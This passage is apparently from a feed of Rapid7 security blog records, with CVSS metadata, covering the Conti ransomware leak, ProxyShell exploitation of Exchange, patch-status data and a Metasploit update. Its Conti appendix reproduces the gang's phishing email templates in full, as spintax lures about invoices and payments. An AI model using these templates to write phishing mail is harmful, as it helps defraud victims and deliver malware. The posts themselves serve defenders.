\u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). \n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell/ProxyLogon)\n\n## Appendix B \u2013 Phishing templates\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} {discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} {sent|mailed|delivered} to you {is paid|is covered|is processed}. \nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. \n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. \n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) &amp; [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), &amp; [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>),, [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for Powershell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibly in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. In order to do this, it is vital that defenders keep up-to-date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection will identify processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may be an indication of a successful attack against these systems and has been observed targeted by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. Exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 